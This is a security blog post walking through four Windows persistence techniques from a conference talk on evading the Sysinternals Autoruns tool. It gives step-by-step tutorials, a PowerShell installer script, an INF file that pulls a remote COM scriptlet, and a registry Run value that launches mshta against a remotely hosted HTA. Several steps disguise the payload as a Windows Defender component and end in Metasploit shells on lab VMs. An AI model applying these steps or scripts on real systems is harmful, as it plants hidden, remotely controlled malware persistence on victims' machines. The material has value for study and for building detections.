Evading Microsoft’s AutoRuns

Background

UPDATE: Kyle wrote a follow-up blog post to mine here: https://medium.com/@KyleHanslovan/re-evading-autoruns-pocs-on-windows-10-dd810d7e8a3f

At DerbyCon 7.0, Chris Bisnett and Kyle Hanslovan gave a talk called “Evading Autoruns”. Kyle and Chris demonstrated the ability to “evade” the Microsoft Sysinternals “Autoruns” tool. They primarily took advantage of the “PATHEXT” Windows environment variable as well as native Microsoft signed executables for persistence with run registry keys. I highly recommend you watch their talk, fantastic work by these guys. Below is a list of everything released by Kyle and Chris.

“Evading Autoruns” Abstract

When it comes to offense, maintaining access to your endpoints is key. For defenders, it’s equally important to discover these footholds within your network. During this talk, Kyle and Chris will expose several semi-public and private techniques used to evade the most common persistence enumeration tools. Their techniques will explore ways to re-invent the run key, unconventionally abuse search order, and exploit trusted applications. To complement their technical explanations, each bypass will include a live demo and recommendations for detection.

Adventure

Now that we’ve reviewed all the materials including watching the talk, let’s deep dive into the interesting technical content from this talk. Our goal is to get the four techniques detailed in Chris and Kyle’s talk working. The way we will approach this is attempting to fully understand the research and apply it practically.

Extension Search Order Autoruns Technique

On slide 68, we see an interesting statement.

The areas I’m paying attention to are highlighted in red boxes above. This immediately made me think of the “PATHEXT” environment variable on Windows. I continued reading the next few slides to make sure I understand how search order works and then I saw the following slide.

If I’m interpreting this correctly, the PATHEXT environment variable looks for the ‘.COM’ extension before ‘.EXE’. The next slide verifies this for us. This research reminds me of Christopher Campbell and Matt Graeber’s “Living Off the Land” talk at Derbycon 3.0.

Alright, we understand how search order works now. The theory is if we modify an existing registry key, we should be able to load a ‘.COM’ instead of a ‘.EXE’ because search order looks for the ‘.COM’ extension first. It’s taking advantage of how Windows works, the “Living Off the Land” philosophy I mentioned briefly above. Let’s keep reviewing their slides.

Looks like this is a registry key for Windows Defender on Windows 10. I’d imagine we have to modify this registry key’s value from “C:\Program Files\Windows Defender\MSASCuiL.exe” to “C:\Program Files\Windows Defender\MSASCuiL” and place a “.COM” file in the same directory. Let’s verify we fully understand what they’re getting at and continue reviewing the slides again.

Woot, we’re understanding everything properly. Let’s make sure they’re adding the “.COM” file to the same directory.

Cool, that’s exactly what they’re doing. I wonder what this looks like in the AutoRuns utility.

Wow, that is a sexy autoruns bypass. The publisher of our ‘.COM’ file is “Microsoft Corporation”. Very nice.

Now that we understand how the “Extension Search Order” works, let’s try it out on Windows 7 and Windows 10. First, I’m going to generate a COM scriptlet payload using a tool I’ve been developing called “GreatSCT” (Great Scott). The requirements to generate COM scriptlets with my tool are Python3 and Metasploit. With the payload we’re generating, Microsoft Excel being installed on our target system is a requirement for it to work properly. If you want something quick, try Casey Smith (@subtee)’s minimalist COM scriptlet calc.exe proof of concept here.

  • git clone https://github.com/GreatSCT/GreatSCT
  • python3 gr8sct.py

You’ll see the following prompt. Press any key to begin.

We’re going to use the “SCT/regsvr32.cfg” option. Type the relevant number and press enter. You can set options by using tab completion and typing “set ListenerPort 80” as an example. Below is how I configured the payload for our “Extension Search Order” test case.

Notice how I set the output file to “MSASCuiL.com”. Type generate and press enter.

Now that we’ve generated a COM payload, we can test out the “Extension Search Order” technique. Let’s spin up a Windows 7 VM with Excel installed on it. First step, let’s modify the Windows Defender registry key.

  • HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SecurityHealth (REG_EXPAND_SZ) – C:\Program Files\Windows Defender\MSASCui

Place your COM payload in C:\Program Files\Windows Defender\ as “MSASCui.com”

Let’s start our metasploit listener.

Restart our Windows 7 VM and wait for our shell.

And it works! See the tutorial section below for details on Windows 10.

Squiblydoo INF Autoruns Technique

First, let’s review “regsvr32.exe” aka “Squiblydoo” by Casey Smith (@subtee).

Here’s how defenders reacted to this.

Chris and Kyle found the following on MSDN regarding “INF” files.

That’s curious, I wonder if we can use this with “regsvr32.exe” or “rundll32.exe”. Let’s keep looking at their slides to see if there’s an example “INF” file.

Okay cool, but how does this work? The syntax looks familiar, maybe they are going to use “rundll32.exe” instead of “regsvr32.exe”.

Awesome, we can use “rundll32.exe” with “INF” files. Let’s make sure we have all the information we need before trying this.

So we can use “rundll32.exe” with “INF” files instead of “regsvr32.exe”. That’s pretty neat, but unfortunately it’s not safe operationally as you can see in the slide from their talk above. Not exactly what I was hoping for, but it’s worth exploring. I’m going to use the same COM scriptlet payload I generated with GreatSCT earlier in the blog post. You can also use Casey Smith (@subtee)’s minimalist COM scriptlet calc.exe proof of concept here. Let’s modify the “shady.inf” provided.

; ———————————————————————-
; Required Sections
; ———————————————————————-
[Version]
Signature=$CHICAGO$
Provider=test
Class=Printer

[Manufacturer]
HuntressLabs=ModelsSection,NTx86,NTia64,NTamd64

; ———————————————————————-
; Models Section
; ———————————————————————-
[ModelsSection.NTx86]
UnregisterDlls = Squiblydoo

[ModelsSection.NTia64]
UnregisterDlls = Squiblydoo

[ModelsSection.NTamd64]
UnregisterDlls = Squiblydoo

; ———————————————————————-
; Support Sections
; ———————————————————————-
[DefaultInstall]
UnregisterDlls = Squiblydoo

[Squiblydoo]
11,,scrobj.dll,2,60,https://blog.conscioushacker.io/testaroo.sct

I’m going to put this on my Desktop and call it “testaroo.inf”.  I also hosted the COM scriptlet payload on my blog. The next step is to create a registry key.

My metasploit listener is still running so all we need to do is restart the Windows 7 VM and wait for our shell. Unfortunately, I did not get a shell back so I opened Process Hacker to see what was going on.

Where is “rundll32.exe” in our process tree? I don’t see it anywhere. To cut this section short, I attempted this on Windows 7 and Windows 10 with both HKLM and HKCU. I couldn’t get this to work using the autoruns registry keys, however, it did work when executing “rundll32.exe setupapi,InstallHinfSection ModelsSection 128 C:\Users\lopi\Desktop\testaroo.inf” manually on Windows 7. I also tried using the calc proof of concept I mentioned previously. Here’s something Chris and Kyle don’t mention in their talk, Windows 10 requires drivers have a legitimate signature in order to be installed without a user prompt. At this point, I decided to stop looking into this.

InfDefaultInstall.exe Autoruns Technique

Moving onto the next technique, “InfDefaultInstall.exe”. Let’s dive in right away. 

Alright cool, we can use “InfDefaulInstall.exe” instead of “rundll32.exe” and apply it the same way as the previous technique. Let’s fire up our Windows 10 VM and see if we have the same digital signature as well as UAC prompt for “InfDefaultInstall.exe”.

There’s the UAC prompt. What about the digital signature?

Uh oh, that’s no good for Windows 10. I’d recommend using this technique on Windows 7 and lower if you do use it. I couldn’t get this to work via the autoruns registry key on Windows 7 and 10. This looked pretty epic in their talk, I guess it’s different in practice.

SyncAppvPublishing.exe Autoruns Technique

Let’s dive right into this one. There’s one slide that says it all.

Seems simple enough, let’s give it a try by adding a registry key to our Windows 10 VM.

Now we need to restart our Windows 10 VM and pray for calc. To weaponize this, we could change this to a variety of builtin utilities. For example, regsvr32.exe or mshta.exe. There are many options available to live off the land.

Hooray, we got this one to work!

Tutorial

Extension Search Order Autoruns Technique

Windows 7

  1. Generate a COM scriptlet payload
  2. Modify existing registry key to load your COM scriptlet instead of the executable.
    • HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SecurityHealth (REG_EXPAND_SZ) – C:\Program Files\Windows Defender\MSASCui
  3. Place your COM payload in C:\Program Files\Windows Defender\ as “MSASCui.com”

Windows 10

  1. Generate a COM scriptlet payload
  2. Modify existing registry key to load your COM scriptlet instead of the executable.
    • HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SecurityHealth (REG_EXPAND_SZ) – C:\Program Files\Windows Defender\MSASCuiL
  3. Place your COM payload in C:\Program Files\Windows Defender\ as “MSASCuiL.com”

Squiblydoo INF Autoruns Technique (Does not work)

Windows 7

  1. Generate a COM scriptlet payload
  2. Modify the “INF” file: https://github.com/huntresslabs/evading-autoruns/blob/master/shady.inf
  3. Add registry key to load your INF file.
    • HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SecurityHealth (REG_EXPAND_SZ) – “rundll32.exe setupapi,InstallHinfSection ModelsSection 128 shady.inf”
  4. Place your INF payload in C:\Windows\system32.

Windows 10 (Not recommended due to digital signature warning and UAC)

  1. Generate a COM scriptlet payload
  2. Modify the “INF” file: https://github.com/huntresslabs/evading-autoruns/blob/master/shady.inf
  3. Add registry key to load your INF file.
    • HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WhateverYouWant(REG_EXPAND_SZ) – “rundll32.exe setupapi,InstallHinfSection ModelsSection 128 shady.inf”
  4. Place your INF payload in C:\Windows\system32.

InfDefaultInstall.exe Autoruns Technique (Does not work)

Windows 7

  1. Generate a COM scriptlet payload
  2. Modify the “INF” file: https://github.com/huntresslabs/evading-autoruns/blob/master/shady.inf
  3. Add registry key to load your INF file.
    • HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WhateverYouWant(REG_EXPAND_SZ) – “InfDefaultInstall.exe shady.inf”
  4. Place your INF payload in C:\Windows\system32.

Windows 10 (Not recommended due to digital signature warning and UAC)

  1. Generate a COM scriptlet payload
  2. Modify the “INF” file: https://github.com/huntresslabs/evading-autoruns/blob/master/shady.inf
  3. Add registry key to load your INF file.
    • HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WhateverYouWant(REG_EXPAND_SZ) – “InfDefaultInstall.exe shady.inf”
  4. Place your INF payload in C:\Windows\system32.

SyncAppvPublishing.exe Autoruns Technique

Windows 10

  1. Generate a “living off the land” payload
    • i.e. mshta.exe https://blog.conscioushacker.io/testaroo.hta
  2. Add registry key to execute your payload.
    • HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WhateverYouWant(REG_EXPAND_SZ) – ‘SyncAppvPublishingServer.exe “.; Start-Process mshta.exe https://blog.conscioushacker.io/testaroo.hta”‘

AutoRuns Powershell Script

This script could be way more dynamic, but it works. Download here.

<#
    AutoRuns v1.0
    License: GPLv3
    Author: @ConsciousHacker
    Credits: @HuntressLabs
    References: https://github.com/huntresslabs/evading-autoruns
#>

function InstallAutoRuns-COM
{
	#Place your com scriptlet in C:\Program Files\Windows Defender\ as "MSASCuiL.com"
	$AutoRuns = "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
	$FakeProgramName = "SecurityHealth"
	$ComScriptlet = '"C:\Program Files\Windows Defender\MSASCui"'

	Set-ItemProperty -Path $Autoruns -Name $FakeProgramName -Value $ComScriptlet -Type ExpandString


}

function UninstallAutoRuns-COM
{
	$AutoRuns = "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
	$FakeProgramName = "SecurityHealth"
	$ComScriptlet = '"C:\Program Files\Windows Defender\MSASCui.exe"'

	Set-ItemProperty -Path $Autoruns -Name $FakeProgramName -Value $ComScriptlet -Type ExpandString
}

function InstallAutoRuns-INFDefaultInstall
{
	param
		(
			[Parameter(Mandatory = $True)]
			[string]$Path
		)
	# Example inf here: https://github.com/huntresslabs/evading-autoruns/blob/master/shady.inf
	# TODO: Generate inf file
	# TODO: param for registry key name
	$AutoRuns = "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
	$infpath = $Path
	$infdefaultinstall = "INF Default Install"
	$ComScriptlet = '"C:\Windows\system32\infdefaultinstall.exe ' + $infpath + '"'

	Set-ItemProperty -Path $Autoruns -Name $infdefaultinstall -Value $ComScriptlet -Type ExpandString
}

function UninstallAutoRuns-INFDefaultInstall
{
	param
		(
			[Parameter(Mandatory = $True)]
			[string]$Path
		)

	# TODO: param for registry key name
	$AutoRuns = "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
	$infpath = $Path
	$infdefaultinstall = "INF Default Install"

	Remove-ItemProperty -Path $Autoruns -Name $infdefaultinstall
}

function InstallAutoRuns-SquiblydooINF
{
	param
		(
			[Parameter(Mandatory = $True)]
			[string]$Path
		)
	# Example inf here: https://github.com/huntresslabs/evading-autoruns/blob/master/shady.inf
	# TODO: Generate inf file
	# TODO: param for registry key name
	$AutoRuns = "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
	$infpath = $Path
	$infdefaultinstall = "Squiblydoo"
	$ComScriptlet = '"C:\Windows\system32\rundll32.exe setupapi,InstallHinfSection ModelsSection 128 ' + $infpath + '"'

	Set-ItemProperty -Path $Autoruns -Name $infdefaultinstall -Value $ComScriptlet -Type ExpandString
}

function UninstallAutoRuns-SquiblydooINF
{
	param
		(
			[Parameter(Mandatory = $True)]
			[string]$Path
		)

	# TODO: param for registry key name
	$AutoRuns = "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
	$infpath = $Path
	$infdefaultinstall = "Squiblydoo"

	Remove-ItemProperty -Path $Autoruns -Name $infdefaultinstall
}

function InstallAutoRuns-SyncAppvPublishing
{
	param
		(
			[Parameter(Mandatory = $True)]
			[string]$Cmd
		)
	$SyncAppvPublishing = '"C:\Windows\system32\SyncAppvPublishingServer.exe".; ' + $Cmd + '""'
	$AutoRuns = "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"

	Set-ItemProperty -Path $Autoruns -Name "SyncAppvPublishing" -Value $SyncAppvPublishing -Type ExpandString

}

function UninstallAutoRuns-SyncAppvPublishing
{
	$AutoRuns = "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
	Remove-ItemProperty -Path $Autoruns -Name "SyncAppvPublishing"
}

Lessons Learned

UPDATE: Kyle wrote a follow-up blog post to mine here: https://medium.com/@KyleHanslovan/re-evading-autoruns-pocs-on-windows-10-dd810d7e8a3f

I need to spend more time learning and writing powershell. This script is very inefficient, it could be way more dynamic. The person doing the research is not always available to answer questions. I reached out to Kyle via a Twitter DM asking questions regarding the “InfDefaultInstall.exe” and “Squiblydoo INF” persistence techniques. The best you can do is attempt to fully understand the research and apply it practically. Documenting your journey helps too, I’m hoping someone smarter than myself can help fill the gaps here.

Credits

Leave a comment

Your email address will not be published. Required fields are marked *